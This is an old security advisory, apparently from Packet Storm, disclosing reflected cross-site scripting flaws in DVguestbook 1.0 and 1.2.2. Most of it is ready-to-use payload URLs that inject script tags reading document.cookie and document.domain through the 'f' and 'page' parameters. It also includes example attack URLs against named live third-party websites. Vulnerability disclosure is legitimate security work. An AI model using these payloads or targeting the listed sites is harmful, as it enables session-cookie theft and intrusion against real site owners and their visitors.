DVguestbook versions 1.0 and 1.2.2 suffer from multiple cross site scripting flaws.
77e527786650af069b7dcca5fae0b701e0cc533c741277b09b04e4c6af83f69b-------------------------------------------------------------------------------------
DVguestbook 1.0 And 1.2.2 Cross Site Scripting
Site:http://suprem.free.fr
Credit : Liz0ziM
webpage:www.biyosecurity.com
Mail :liz0@bsdmail.com
-------------------------------------------------------------------------------------
DVguestbook 1.0 Xss
http://victim/path/dv_gbook.php?d=0&f='"><script>alert(document.cookie)</script>
http://victim/path/dv_gbook.php?d=0&f='"><script>alert(/BiyoSecurityTeam/)</script>
http://victim/path/dv_gbook.php?d=0&f='"><script>alert(document.domain)</script>
DVguestbook 1.2.2 Xss
http://victim/path/index.php?page="><script>alert(document.cookie)</script>
http://victim/path/index.php?page="><script>alert(/Liz0ziM/)</script>
http://victim/path/index.php?page="><script>alert(document.domain)</script>
-------------------------------------------------------------------------------------
Example:
DVguestbook 1.0
http://www.award-computer.com/OR/dv_gbook.php?d=0&f='"><script>alert(/Liz0ziM/)</script>
DVguestbook 1.2.2
http://www.moah-fiya.com/guestbook/index.php?page="><script>alert(/Liz0ziM/)</script>
----------------------------------------------------------------------------------------
Source:
http://www.blogcu.com/Liz0ziM/326668/
http://biyosecurity.be/bugs/dvguestbook.txt
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed